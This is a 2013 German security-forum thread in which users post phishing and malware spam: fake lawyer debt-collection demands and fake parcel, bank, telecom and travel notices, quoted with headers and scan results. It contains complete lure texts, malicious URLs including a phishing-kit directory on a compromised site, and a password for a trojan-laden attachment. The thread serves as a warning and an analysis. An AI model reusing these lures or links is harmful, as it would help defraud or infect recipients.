Mit der Bestellung im Online Shop vom 24.05.2013 haben Sie sich gesetzlich verpflichtet die Summe in Höhe von 690,00 Euro an unseren Mandanten zu begleichen. Die Lieferung erfolgte an die angegebene Adresse und ist nachweisbar.

Dem sind Sie bis jetzt nicht nachgekommen, obwohl Sie sich in Zahlungsverzug befinden und mit sehr erheblichen Kosten und Unannehmlichkeiten rechnen sollten.

Wir bitten Sie, den fälligen Betrag so bald wie möglich auf das Bankkonto von ATU Online GmbH zu überweisen.

Die Kontodaten und weitere Einzelheiten der Bestellung sehen Sie im Anhang. Für den Eingang des Betrags geben wir Ihnen eine gesetzliche Frist bis zum 07.07.2013. Gegebenenfalls können Sie die ausstehende Rechnung aber in angemessenen Monatsraten bezahlen, falls ein akzeptabler Vorschlag innerhalb der Frist bei uns eintrifft.

Mit besten Grüßen
Laura Huber Anwalt Buro

Die Phisher lernen dazu. Korrekte Grammatik und Rechtschreibung, ansonsten die übliche Zip-Datei im anhang.

Hier der zugehörige Header, meine Mailadresse habe ich durch ... ersetzt.
From Anwalt Laura Huber Wed Jul 3 07:09:19 2013
X-Apparently-To: ... via 188.125.83.133; Wed, 03 Jul 2013 06:10:07 +0000
Return-Path: <denismarco [at] videotron.ca>
Received-SPF: none (domain of videotron.ca does not designate permitted sender hosts)
bGVpIHd1cmRlbiBoZXV0ZSBhbSAwMy4wNy4yMDEzIHZvbSBVbnRlcm5laG1l
biBBVFUgT25saW5lIEdtYkggYmVhdWZ0cmFndCBJaHJlIGZpbmFuemllbGxl
biBJbnRlcmVzc2VuIGluIElocmVtIEZhbGwgenUgc2Now7x0emVuLiBNaXQg
ZGVyIEJlc3RlbGx1bmcgaW0gT25saW5lIFNob3Agdm9tIDI0LjA1LjIwMTMg
aGFiZW4gU2llIHNpY2ggZ2VzZXR6bGljaCB2ZXJwZmxpY2h0ZQEwAQEBAQN0
ZXh0L3BsYWluAwMyAkFUVSBPbmxpbmUgR21iSCBLb3N0ZW5yZWNobnVuZyAw
My4wNy4yMDEzLnppcANhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0DAzExMQ--
X-YMailISG: bfxnGrkWLDtCzGxd.UFEzEPkHJVH.AgFFcWB2zANPjMX0eE8
1q3MocO3ee8H5sQp73Em_lGxpjWGdbtBNKjmu5vgQxWQJ4jgAHr9Yume6Bgc
Dt7yyPqtZZFtLf7QsznvdjTXBu4SMWvQn8uTfOFFFgMkuKTp1RjOzVzvl96Z
ENds6mBrvaom2689xXAJLGT7TAmvJxztWirC3wxCsKT34Xr5IV3e0O3CiBpU
56.OgyF5djX2VbinylnETKlGJMQac_t6m.Dc6aSrpH5KxPjMJLh9CmrSR8S6
cQB9FJk0xLbx_dQyNQDCwvuWdTxdoqWj5gtIxaRjHXnSXYoG2fy3kdm1W1ox
YkvlWxbO7mrrsbPYlQiwM8o9hCnL7A44Z8SiYIG3ObQeb5TUPi6545C_1Sry
woFOdEeksVT2MC5LqkaI6UwVde1k94TFCYc0AtKRF6W7psIPAvzbUoleO9O9
2.4HspSofWd4D0CmfZIPE5P4dO8S.Fsu9d1RYcKW.Td59gdsNUxKrSu5UclJ
.clb05ggMqCDkaZu_7I6JD9xtFnfWqTFRU8UAHIVOEr1DWvakmHhWazkA7Z0
8X8Y8dG7V_ToWlUXGw9gn13LtOOA7wDFYZcJ5R40ZuXsjpweftQREkRVTqG6
8kcB7lV0AdKxeNwx9nh6NCqgn33Mxf9sr93Us0ZC__vh8qm9F2kuiaK7xqr7
UNvGRuB5b7x0fBD35eX19GHfTxxw_LAjVtq63JSK2ceO6T8BYCtS1.TsvecT
HjDRkv.JS5nnYOU5nfYJYAYJMYsU.PEwpQRfRVlv.zcm_nwAeQj5lp5sirWQ
agA6NMGHZPe5HRuRo5dhYurRBJhfE6adPu1iXk6mWp.0cVQ5pbHB3F0GpwBU
A0zda_PwMiuh0_OtR.IM1M4jSU4cAaVx0gIwkmBAsDFLx_eDcp_PrVlJyRcp
XBGKKMNZDErw5yNPEZ7mZWUrjXgUu4tnHDvfMYzKDY1lndEBi0lNbtSPla5x
NgpoOXnu6DHJsJL62hpXk0C6Z.OIVq.9cOKZHm1_qgONcp3bX32l7UwpppgX
dwYuuqHcMBkH2Yb2tQMT7zNhuz9GJEHHMCEiJcwYIya9ECLKN4ySgYI3XARI
5NT64b.mGLl9Jckjt0l45lECPDc9csWkUszgMhlipz.6KEMbcMJ3DtWh4I8i
uCbsYs_3rCP5xxttDf8OTk_U67I5UYNPXq6.GU1bWu02xvs9AC0p2qLlbob8
pRPdBYbn.jqqGiBc6qTZrwXstN9VYaP3qGA0QiQ2Cb4NPOXEEQ--
X-Originating-IP: [24.201.245.36]
Authentication-Results: mta1058.mail.ird.yahoo.com from=videotron.ca; domainkeys=neutral (no sig); from=videotron.ca; dkim=neutral (no sig)
Received: from 127.0.0.1 (EHLO relais.videotron.ca) (24.201.245.36)
by mta1058.mail.ird.yahoo.com with SMTP; Wed, 03 Jul 2013 06:10:07 +0000
MIME-version: 1.0
Content-type: multipart/mixed; boundary="Boundary_(ID_tOH7/IdA6bJwPlIEPvsj8g)"
Received: from JAKOB-LENOVO21
(ppp-188-174-71-23.dynamic.mnet-online.de [188.174.71.23])
by VL-VM-MR003.ip.videotron.ca
(Oracle Communications Messaging Exchange Server 7u4-22.01 64bit (built Apr 21
2011)) with ESMTPA id <0MPC002LYJSKSY70 [at] VL-VM-MR003.ip.videotron.ca> for
...; Wed, 03 Jul 2013 02:10:06 -0400 (EDT)
Message-id: <0MPC002M2JSQSY70 [at] VL-VM-MR003.ip.videotron.ca>
From: Anwalt Laura Huber <denismarco [at] videotron.ca>
To: ...Meine Mailaddi
Subject: Inkasso Beauftragung von ATU Online GmbH
Date: Wed, 03 Jul 2013 06:09:19 +0000 (GMT)
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Length: 114917

blizzy
03.07.2013, 13:13
Korrekte Grammatik und Rechtschreibung,

Davon sind sie weit entfernt.

Silke074
03.07.2013, 13:27
Davon sind sie weit entfernt.

Beim schnellen durchlesen. Immerhin hört es sich nicht mehr so holprig an wie bei früheren Mails.

schara56
25.07.2013, 11:37
Received: from mx-01.ngi-net.de ([5.9.41.38]) by mx-ha.gmx.net (mxgmx109)
with ESMTP (Nemesis) id 0MJn9U-1V3NX60iDk-001AUY for
<x>; Thu, 25 Jul 2013 11:13:00 +0200
Received: from Grazyna-PC (dyn-cdma-84-44-180-48.netcologne.de [84.44.180.48])
by mx-01.ngi-net.de (Postfix) with ESMTPSA id 66249828013E
for <x>; Thu, 25 Jul 2013 11:12:51 +0200 (CEST)

Guten Tag Pseudofirmenname Kunde,

Sie haben Ihre Bestellung vom 15.06.2013 bis heute nicht beglichen. Die Rechnung konnte nicht von Ihrem Bankkonto abgebucht werden.

Aus diesem Grund wurde unsere Anwalts-Kanzlei beauftragt die vertraglichen Rechte der Firma Pseudofirmenname zu schützen.

Die Summer der Bestellung inklusive der Versandkosten ist 404,62 Euro. Dabei wird Ihnen eine Mahngebühr von 19,00 Euro berechnet und die Kosten unserer Tätigkeit von 12,14 Euro.

Sie haben bis zum 28.07.2013 die letzte Chance das Geld an die im Vertrag angegebene Kontonummer zu überweisen. Falls Sie die Zahlung verweigern sehen wir und gezwungen ein Gerichtsverfahren gegen Sie anzustreben.
Die Lieferdaten Ihrer Bestellung und die Kontodaten sehen Sie im angehängten Ordner.

Anhang vom 25.07.2013
- Übersicht der Bestellung
- Bankdaten

Mit besten Grüßen

A* S*
Inkasso Anwaltschaft
Im Anhang eine Inkasso Mahnung Sanicare Gmbh & Co. AG vom 25.07.2013.zip:
https://www.virustotal.com/en/file/082c4cdab407b682f2054e2c7daf2faca4e5c24949c8954561dd35d68c3f1386/analysis/1374744571/
http://i.imagebanana.com/img/f7kwbz6b/thumb/001.jpg (http://www.imagebanana.com/view/f7kwbz6b/001.jpg)
http://virusscan.jotti.org/de/scanresult/a645965f9cd94912cf107e14aca285b6a98c14d1
http://i.imagebanana.com/img/wxeilx5b/thumb/002.jpg (http://www.imagebanana.com/view/wxeilx5b/002.jpg)

kjz1
28.07.2013, 10:05
Und wieder mal:

Received: from res01.greatnet.de (res01.greatnet.de [83.133.95.14])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by xxxxx (Postfix) with ESMTPS id BA1D81A8250
for xxxxx; Sun, 28 Jul 2013 05:32:52 +0200 (CEST)
Received: by res01.greatnet.de (Postfix, from userid 1083)
id 0ABD55A05B1; Sun, 28 Jul 2013 05:32:52 +0200 (CEST)


DHL

DHL Notification
Tracking ID: 0093730380
Status: Shipment not delivered

Your parcel has arrived at July 24th. Courier was unable to deliver
the parcel to you.

To get additional information use any of these options:

1) Go to the following URL in your browser:

Get Shipment Info

2) Enter the Tracking ID on tracking page:

Tracking Page

Disclaimer:
This message was created by DHL System.
No authentication of email address has been performed.

Deutsche Post DHL

2013 DHL International GmbH. All rights reserved.

http://abeiro.es/main.php?info=1fRgNUiBigtd4WSclYRWnA==
IP: 185.2.129.180 ---> REDCORUNA, ES

cmds
14.08.2013, 10:50
Derzeit werden von einem uns unbekannten Dritten gefälschte Lidl E-Mails versendet. Diese erwecken den Anschein von Lidl zu stammen. Es wird insbesondere die Absenderadresse rechnung-noreply [at] lidl-shop.de genutzt.

Lidl.de (http://www.lidl.de/de/Aktuelles?cUid=1)

Walbeck
04.09.2013, 18:29
Diese Inkassoschreiben inklusive (wahrscheinlich) verseuchtem Link werden jetzt auch per SMS verschickt, wohl in der Annahme, daß die meisten Empfänger ein Smartphone haben.
Inkasso-Büro fordert per SMS Geld ein (http://www.svz.de/nachrichten/home/top-thema/artikel/inkasso-buero-fordert-per-sms-geld-ein.html?tx_ttnews[backPid]=111&cHash=988ac99cf8520e97d5001ab146be7da7)

Eniac
09.09.2013, 08:46
Received: from wan.qualifirst.iasl.com ([206.210.96.171]) by mr4.firma.tld
with esmtp (envelope-from <welcome [at] aexp.com>) id 1VHyVn-0006wY-IK; Fri, 06
Sep 2013 18:03:56 +0200
Received: from 206.210.96.171(helo=cewlgoq.xupbx.info) by
wan.qualifirst.iasl.com with esmtpa (Exim 4.69) (envelope-from ) id
1MM6YH-7511so-OG for esl [at] firma.tld; Fri, 6 Sep 2013 11:03:56 -0500
Received: from 206.210.96.171 (account welcome [at] aexp.com HELO
oguudkrzpjp.tussn.ru) by wan.qualifirst.iasl.com (CommuniGate Pro SMTP 5.2.3)
with ESMTPA id 712603529 for esl [at] firma.tld; Fri, 6 Sep 2013 11:03:56
-0500
Date: Fri, 6 Sep 2013 11:03:56 -0500
From: Fiserv <Lemuel_Katz [at] fiserv.com>
Message-ID: <3557264150.WAUUUJ8H823928 [at] hrdprrrtacnzjdy.hxifvyqbjbcx.info>
To: verschiedene Adressen
Subject: FW: Scanned Document Attached
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------633B899C6FC5AB"


Dear Business Associate:

Protecting the privacy and security of client, company, and employee
information is one of our highest priorities. That is why Fiserv has
introduced the Fiserv Secure E-mail Message Center - a protected e-mail
environment designed to keep sensitive and confidential information
safe. In this new environment, Fiserv will be able to send e-mail
messages that you retrieve on a secured encrypted file.

You have an important message from Reggie_Courtney [at] fiserv.com.
To see your message, use the following password to decrypt attached file: JkSIbsJPPai

If this is your first time receiving a secure file from the
Fiserv Secure E-mail Message Center, you will be prompted to set up a
user name and password.

This message will be available until Saturday Sep 07, 2013 at 17:53:47
EDT4

If you have any questions, please contact your Fiserv representative.

Sincerely,
Your Associates at Fiserv

Additional information about Fiserv Secure E-mail is available by
entering http://www.fiserv.com/secureemail/ into your Web browser and
pressing Enter.


The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you.

Angehängt war eine FSEMC.esl.zip (Inhalt FSEMC.06092013.exe), laut https://www.virustotal.com/de/ handelt sich dabei um einen Win32/TrojanDownloader.Small.PRL


Eniac

kjz1
10.09.2013, 18:57
Wieder als Dateianhang:

Received: from mail.pelhamonline.com (mail.pelhamonline.com [216.170.66.2])
by xxxxx (Postfix) with ESMTP id 5226A3D6008
for xxxxx; Tue, 10 Sep 2013 18:11:14 +0200 (CEST)
Received: from [23.38.75.68] (helo=tknsrtrjtmai.muvpebavj.com) by mail.pelhamonline.com with esmtpa (Exim 4.69) (envelope-from ) id 1MMQ19-0657gf-O3 for xxxxx; Tue, 10 Sep 2013 10:11:14 -0600

Leider sehr vermurkst, da HTML formattiert:


This is to confirm that one or more items in your order has been
shipped. Note that multiple items in an order may be shipped
separately.
You can review complete details of your order on the Order
History page
Thanks for choosing FedEx.
Order Confirmation Number: 8477728

Order Date: 09/09/2013

Redemption Item Quantity Tracking Number

Paper, Document2

fedex.com Follow FedEx: You may receive separate e-mails with tracking information for
reward ordered.
My FedEx Rewards may be modified or terminated at any time without
notice. Rewards points available for qualifying purchases and certain
exclusions apply. For details and a complete listing of eligible
products and services please read My FedEx Rewards Terms and
Conditions .
©2012 FedEx. The content of this message is protected by copyright
and trademark laws under U.S. and international law. Review our
privacy policy . All rights reserved.

im Anhang: Order history page.zip

http://virusscan.jotti.org/de/scanresult/0568c25d60a31962432ed38378b574c8086c81a5

https://www.virustotal.com/de/file/a73e9eadfaabbfb4f688bc2a739ce5a1daf1380788a1bda5f31fb6dad17c760a/analysis/1378829644/

Frechdachs
11.09.2013, 19:08
Hallo zusammen,

folgendes ist grade bei mir aufgeschlagen mit der üblichen, vermutlich virenverseuchtem 94,2KB Zipdatei im Anhang.
Man beachte auch die Rechtschreibung und die Grammatik.


Guten Tag Online Kunde,

der Abzug von Ihrem Bankkonto für die Bestellung vom 19.08.2013 konnte nicht durchgeführt werden. Es wurden alle Geldeingänge bis zum 11.09.2013 berücksichtigt.

Die Summer der Bestellung inklusive der Versandkosten ist 147,03 Euro. Unser Anwaltsbüro wurde berechtigt des ausstehenden Betrag für Ihre Bestellung einzufordern. Zuzüglich wird Ihnen eine Mahngebühr von 28,00 Euro berechnet und die Kosten unserer Beauftragung von 41,68 Euro.

Weitere Einzelheiten der Bestellung und die Kontodaten sind im Anhang. Falls Sie die Zahlung nicht tätigen sehen wir und gezwungen ein Gerichtsverfahren gegen Sie anzustreben. Sie haben bis zum 14.09.2013 Zeit das Geld zu zahlen.

Mit freundlichen Grüßen

Lukas Haas Anwaltskanalei

Hervorhebungen durch mich.

Return-Path: <silv.bau [at] t-online.de>
Received: from mailout03.t-online.de (mailout03.t-online.de [194.25.134.81])
(using TLSv1 with cipher AES256-SHA (256/256 bits))
(No client certificate requested)
by mtain-db04.r1000.mx.aol.com (Internet Inbound) with ESMTPS id 8755538000055
for <Mailadresse [at] provider.de>; Wed, 11 Sep 2013 11:25:21 -0400 (EDT)
Received: from fwd08.aul.t-online.de (fwd08.aul.t-online.de )
by mailout03.t-online.de with smtp
id 1VJmGX-0001B0-V7; Wed, 11 Sep 2013 17:23:38 +0200
Received: from Doreen (VU0cW6ZGQhKid-aLalKt9sh+nxYAjvMSdoQMfJAAL8Z-NLCeVSJk0ALwiHZqL2Qw8Z@[2.202.191.242]) by fwd08.t-online.de
with esmtp id 1VJmGP-02CfJ20; Wed, 11 Sep 2013 17:23:29 +0200
From: "Mahnbescheid Lukas Haas" <silv.bau [at] t-online.de>
To: "keine Name" <Mailadresse [at] provider.de>
Subject: 11.09.2013 Ihre Kontoabbuchung ist gescheitert
Date: Wed, 11 Sep 2013 15:23:29 GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106

Gruß Frechdachs

Johannes
16.09.2013, 15:01
From: - Mon Sep 16 12:05:24 2013
X-Account-Key: account6
X-UIDL: 196385a20ea7e97e1814889da8e9627f
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
X-Envelope-From: <cainsyp264 [at] autoweek.nl>
X-Envelope-To: <ich [at] meinemail.de>
X-Delivery-Time: 1379321527
X-UID: 2449
Return-Path: <cainsyp264 [at] autoweek.nl>
X-RZG-MI-VALUES: bm=0 mafl=1 sh=0 du=0 sp=2,1 vv=1 nf=0
X-Strato-MessageType: email
X-RZG-CLASS-ID: mi
Received: from advi18.static.otenet.gr ([79.129.59.8]) by smtpin.rzone.de (RZmta 32.1 OK) with ESMTP id H060b1p8G8Deqq for <ich [at] meinemail.de>; Mon, 16 Sep 2013 10:52:07 +0200 (CEST)
Received: from [26.65.164.119] (helo=vtgvycfgpk.phqxoaxgudyb.biz) by advi18.static.otenet.gr with esmtpa (Exim 4.69) (envelope-from ) id 1MML2G-7093hl-60 for ich [at] meinemail.de; Mon, 16 Sep 2013 10:52:06 +0200
Message-ID: <650438136534683822.475U6LWN289224 [at] aablhegvtdivo.buqcxjhemak.biz>
From: <buchungsbestaetigung [at] bahn.de>
To: <ich [at] meinemail.de>
Subject: Buchungsbest&#228;tigung (Auftrag LAN4A4)
Date: Mon, 16 Sep 2013 10:52:06 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=a__dabqwqobw_59_32_85"



Buchungsbest&#228;tigung (Auftrag 86D19O)

Sehr geehrte, vielen Dank f&#252;r Ihren Fahrkartenkauf. Ihre Buchungsdaten: Auftragsnummer: MY5FRH Identifizierungskarte: BahnCard ****5530 Kundennummer: 97101398 Das sollten Sie wissen: Bitte drucken Sie Ihr Online-Ticket im DIN A4 Format aus!

Kein Link, kein Dateianhang, nix... was soll DAS denn bringen?

thomas1611
16.09.2013, 15:08
die üben noch - gehört eher in die Exploits-Abteilung.

Johannes
16.09.2013, 15:12
Gehört das HIER hin? Ich dachte HIER seien eMails mit
- Viren im Anhang
- Links zu "verseuchten" websites
- dazu Auffordern, irgendetwas zu bezahlen
- links, die codiert irgendwie Rückschlüsse auf die Existenz des Bespammten liefern.

in dieser "Buchungsbestätigung" ist ja nix dergleichen, daher hatte ich das nicht in dieswer Rubrik gesehen. Meine Frage bleibt: Was soll eine solche eMail bringen?

Wuschel_MUC
16.09.2013, 15:21
in dieser "Buchungsbestätigung" ist ja nix dergleichen, daher hatte ich das nicht in dieswer Rubrik gesehen. Meine Frage bleibt: Was soll eine solche eMail bringen?
Wie Thomas schrieb: die üben noch.

Wuschel

kjz1
16.09.2013, 19:57
in dieser "Buchungsbestätigung" ist ja nix dergleichen, daher hatte ich das nicht in dieswer Rubrik gesehen. Meine Frage bleibt: Was soll eine solche eMail bringen?

Solche verseuchten Anhänge werden oft 'on the fly' vom Virenprogramm von einem ebenso gecrackten Server angefordert (da die Viren meist stundstündlich 'mutieren', um einen Vorsprung vor den Virenscannern zu gewinnen). Wenn der aber gerade unpässlich ist...

carsten.gentsch
16.09.2013, 21:39
Eben aufgeschlagen und wird eine gecrakcte Seite sein trauriges inneleben aber interessant!!!!


http://creonsystems.com.au/deutschebank
Unbedingt sollte man sich da hier ansehen!!!

[DIR] Parent Directory -
[ ] gen_validatorv4.js 06-Feb-2012 00:21 31K
[TXT] initger.do.htm 14-Mar-2013 04:00 21K
[DIR] initger.do_files/ 14-Sep-2013 12:58 -
[ ] process.php 14-Sep-2013 10:24 4.4K
lerne deinen Feind kennen man bekommt ja selten sowas zu sehen ;) bitte tackern habs eben gesehen!

Mittwoch
30.09.2013, 18:25
Jetzt ist wieder die Telekom dran. Heute bereits in zwei identischen Varianten aufgeschlagen:


Betreff: RechnungOnline Monat Oktober 2013

Ihre Rechnung für Oktober 2013

Guten Tag,

mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme im Monat Oktober 2013 beträgt: 41,87 Euro.

Den aktuellen Einzelverbindungsnachweis – sofern von Ihnen beauftragt – und das Rechnungsarchiv finden Sie im Kundencenter.

Diese E-Mail wurde automatisch erzeugt. Bitte antworten Sie nicht dieser Absenderadresse. Bei Fragen zu RechnungOnline nutzen Sie unser Kontaktformular.

Informationen über die Umstellung auf den einheitlichen Euro-Zahlungsverkehrsraum (SEPA) finden Sie hier.

Speziell für Sie: Möchten Sie zukünftig Informationen über neue Produkte und Tarife erhalten, melden Sie sich zu unserem kostenlosen Informationsservice an.

Mit freundlichen Grüßen

R*** H***
Leiter Kundenservice
Die Summe variiert leicht. An die erste Mail ist eine "2013_10rechnung_1101018827.zip (https://www.virustotal.com/de/file/5d8d5e86165091b7b5aac4c98e9f069075c5191e250f3bec97cbc57c1e0b3fda/analysis/1380557556/)" [Link führt zu VirusTotal.com] und an die zweite eine "2013_10rechnung_0053543959.zip" angehangen, die beide virenverscuht sind. Der Link führt zum Scanergebnis von VirusTotal.com, wo derzeit 16 von 48 Scannern anschlagen.

Beide Mails wurden über Botnetze abgesetzt und fälschen im HELO eine Telekom-Absenderangabe:

Received: from mail.balticmaster.lt (mail.balticmaster.lt [82.135.221.67])
by mx.kundenserver.de (node=mxeu0) with ESMTP (Nemesis)
id 0LoFVF-1W1ggx2yuf-00gtFJ for blah [at] blubb.tld; Mon, 30 Sep 2013 18:02:09 +0200
Received: from [7.117.99.105] (helo=snqxpbxbblafn.bxmgbdgcy.com)
by mail.balticmaster.lt with esmtpa (Exim 4.69)
(envelope-from )
id 1MMZ7B-5103qa-56
for blah [at] blubb.tld; Mon, 30 Sep 2013 18:02:05 +0200
Date: Mon, 30 Sep 2013 18:02:05 +0200
From: <rechnungonline. [at] telekom.de>
To: blah [at] blubb.tld
Subject: RechnungOnline Monat Oktober 2013

Received: from [217.6.27.26] ([217.6.27.26])
by mx.kundenserver.de (node=mxbap4) with ESMTP (Nemesis)
id 0MSb8m-1VJ2zG14I0-00SHSB for blah [at] blubb.tld; Mon, 30 Sep 2013 16:18:43 +0200
Received: from [201.44.40.117] (account ***@telekom.de HELO ipsfnvxg.bvzghl.com)
by (CommuniGate Pro SMTP 5.2.3)
with ESMTPA id 489424962 for blah [at] blubb.tld; Mon, 30 Sep 2013 15:15:13 +0100

Wie immer gilt: Finger weg!
Schönen Gruß
Mittwoch

cmds
03.10.2013, 12:35
Nun hat man sich die Anhänge erspart, dafür massenhaft verschleierte Links in einer html Mail

From - Wed Oct 02 16:34:38 2013
X-Account-Key: account3
X-UIDL: UID19030-1132734918
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Received: from ip-gt.190.143.206.241.telefonica-ca.net ([190.143.206.241])
by mail-in7-pp.ewetel.de (8.12.1/8.12.9) with ESMTP id r92ERCcr001815
for <Me [at] tld.net>; Wed, 2 Oct 2013 16:28:00 +0200
X-Envelope-To: <Me [at] tld.net>
Received: from [235.200.235.134] (port=95014 helo=[192.168.2.53])
by 190.143.206.241 with asmtp
id 1rqLaL-000AP-00
for Me [at] Tld.net; Wed, 2 Oct 2013 08:28:00 -0600
Message-ID: <524C2D1F.0050104 [at] me.com>
Date: Wed, 2 Oct 2013 08:28:00 -0600
From: support [at] orders.staples.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20110929 Thunderbird/7.0.1
MIME-Version: 1.0
To: Me [at] tld.net
Subject: Staples order #: 3568250447
Content-Type: multipart/alternative;
boundary="------------030309050909090706040604"
X-Spam: Not detected
X-Mras: Ok
X-CheckCompat: OK


Thank you for shopping Staples.Here's what happens next:

Order No.:3568250447

Customer No.:1904063296 Method of Payment:Credit Card

Track order: Track your order


Delivery Address:Alex Smith46 COMMERCE STGREENFIELD CA 088399732

Item1 Qty. Subtotal
DELL 1320 BLACK TONERItem No.:747062Price:$68.72/eachExpected delivery:10/4/2013byUPS 2 $120.93

Item2 Qty. Subtotal
DELL RY854 CYAN TONERItem No.:716118Price:$67.72/eachExpected delivery:10/4/2013byUPS 2 $128.20



Subtotal:: $246.92
Delivery: FREE
Tax: $15.55

Total: $251.82

Your order is subject to review and the expected delivery date(s) noted above are pending credit or check approval. Won't be there to sign for your order from 9 am to 5 pm, Monday - Friday. Print ourDriver Release. Some residential orders may be delivered by UPS as late as 7 pm. Questions about your order? Call us at 1-800-3STAPLE (1-800-378-2753) or email us atsupport [at] orders.staples.com. You can also fax us at 1-800-333-3199. See our return policy. Our prices vary from store prices. Not responsible for typographical errors. Not all items are available. We reserve the right to limit quantities, including the right to prohibit sales to resellers. Thanks for shopping Staples.




Den html Anteil erspare ich mir

die obskuren Links zeigen auf http://fuzongroup.com/pointer/blabla/blaba (Zusätze immer verschieden!)

Frechdachs
03.10.2013, 20:49
Hallo zusammen,

gestern habe ich folgende Mail von GMX(?) bekommen.


Liebes GMX Mitglied,

eine an Sie adressierte E-Mail wurde von unserem Virenscanner
als gefährlich eingestuft.


Um weiteren Schaden für Sie auszuschließen, wurde die E-Mail gelöscht.

Es folgen Details zu der betroffenen E-Mail:

Von: "Abmahnung Lasse Thurn" <anonymisiert [at] orange.fr>
An: "Mein Name" <Meine Mailadresse [at] gmx.de>
Datum: Wed, 2 Oct 2013 17:27:47 GMT
Betreff: Ihre stornierte Bank-Lastschrift von >Mein Name<

Falls Ihnen der Absender persönlich bekannt ist, sollten Sie sich mit
ihm in Verbindung setzen und ihn darauf hinweisen, dass sein PC
wahrscheinlich von einem Virus befallen ist.

Die Einstellungen zu Ihrem GMX Virenscanner können Sie jederzeit unter
Optionen/Virenschutz anpassen.

Ihr GMX Team

[ Dies ist eine automatisch generierte Nachricht, bitte
antworten Sie nicht an diesen Absender. Weitere Informationen
finden Sie in der Online-Hilfe unter http://faq.gmx.net ]

Was haltet ihr davon? Das ist das 1. Mal, dass ich solch eine Mail bekomme

MIME-Version: 1.0
Message-Id: <trinity-131287d6-da58-4746-96fc-b90a9d4f6ba2-1380734869528 [at] msvc003>
From: "GMX Virenschutz" <virenschutz [at] gmxnet.de>
To: meine Mailadresse [at] gmx.de
Subject: VIRENVERDACHT: "Abmahnung Lasse Thurn" <anonymisiert [at] orange.fr>
Content-Type: multipart/mixed;
boundary="----=_Part_120482244_1929623221.1380734869528"
Date: Wed, 2 Oct 2013 19:27:49 +0200 (CEST)
X-Provags-ID: V03:K0:JQlOL6noExMEvcvHsskrWtwMRKHGSvBakdIGx3GBBSr
CC9X9ONpF44gnFzy74PiN7+9zTDz0IVB80RSFMXAUQjLVa9s6R
jUh8LMLuSPesd6RKzCR8PejjA6XWrAjXOfhIRE+kL7y9lrmdm1
jwPEBmoo0jxCj7b9PZdbdlhdN8pLlMc/Wbgj6TMOirK9udwBC8
yTTgbzNecHHOIXHPpDftvUBEZN/QdRlkI5kUAjJjTYYL3kucVd
AZO6HNsEroIFtGRAq+bhUjMu/PvQBxEPssaNy92uwZPwfSEenf wUI4FY=
X-Antivirus: avast! (VPS 131002-0, 02.10.2013), Inbound message
X-Antivirus-Status: Clean

Gruß Frechdachs

@ Moderation: Falls woanders besser passt, bitte verschieben.

carsten.gentsch
03.10.2013, 22:13
Ich erhalte diese Emails auch mit gewisser regelmäßigkeit.
aber das hier sollte reichen um die email zu filtern und zu löschen.

VIRENVERDACHT: "Abmahnung Lasse Thurn" <anonymisiert [at] orange.fr>

Denn ich gehe davon aus das DU mit keinen aus der richtung zu tun hast oder?

gruß

Mittwoch
03.10.2013, 22:23
Was haltet ihr davon? Das ist das 1. Mal, dass ich solch eine Mail bekomme
Ist doch positiv. GMX hat das Muster richtig erkannt und die Mail in Quarantäne geschoben. Ist der übliche Schädlingsmist, die Meldung ist hier indirekt also ganz richtig.

Schönen Gruß
Mittwoch

Mittwoch
29.10.2013, 11:41
Return-Path: <rancidityesbj9 [at] booking-lufthansa.com>
Delivery-Date: Tue, 29 Oct 2013 10:48:56 +0100
Received: from 87-252-35-244.fast.net.uk (87-252-35-244.fast.net.uk [87.252.35.244])
by mx.kundenserver.de (node=mxbap0) with ESMTP (Nemesis)
id 0Lki16-1W939m2Ufk-00ah48 for blah [at] blubb.tld; Tue, 29 Oct 2013 10:48:56 +0100
Received: from [73.197.113.145] (helo=wrkvoyprdi.owrbxgt.ua)
by 87-252-35-244.fast.net.uk with esmtpa (Exim 4.69)
(envelope-from )
id 1MMHZO-4440td-V4
for blah [at] blubb.tld; Tue, 29 Oct 2013 09:48:54 +0000
Message-ID: <702400844553097860.D61IRO5H346373 [at] yxpilgaqhlyysk.qefyyhqhji.com>
From: <online [at] booking-lufthansa.com>
Subject: Reiseinformation, Abflug am 08. November 2013; KV61D
Date: Tue, 29 Oct 2013 09:48:54 +0000
Die 73.197.113.145, über die die Mail abgeworfen wurde, gehört zu einer amerikanischen Kabellgesellschaft, vermutlich Zombie.

Man versucht den Trick mit einer Online-Buchung (meine Hervorhebungen):


Falls Sie diese Reiseinformation nicht oder nur teilweise lesen können, öffnen Sie bitte die angehängte PDF-Version.
Dieses ist eine automatisch erzeugte e-Mail. Bitte antworten Sie nicht hierauf.
Buchungscode:
6WO28D
Lufthansa Service Center

Reiseinformation

Reisedaten für:
Ticketnummer: 508-9456207095 *
etixŽ Identifikation: XXXXXXXXXXXX3604

* Den Passenger Receipt (Rechnungsbeleg) erhalten Sie durch einen Klick auf die Flugscheinnummer bis 30 Tage nach Reisebeginn.

Flug Datum Von Nach Abflug Ankunft Buchung
Hier stehen dann keine Daten… [Bemerkung von Mittwoch eingefügt]
Alleinreisendes Kind:

Flug Datum Von Nach Abflug Ankunft Buchung
Hier stehen dann keine Daten… [Bemerkung von Mittwoch eingefügt]
Alleinreisendes Kind:


Informationen für Ihren Flug

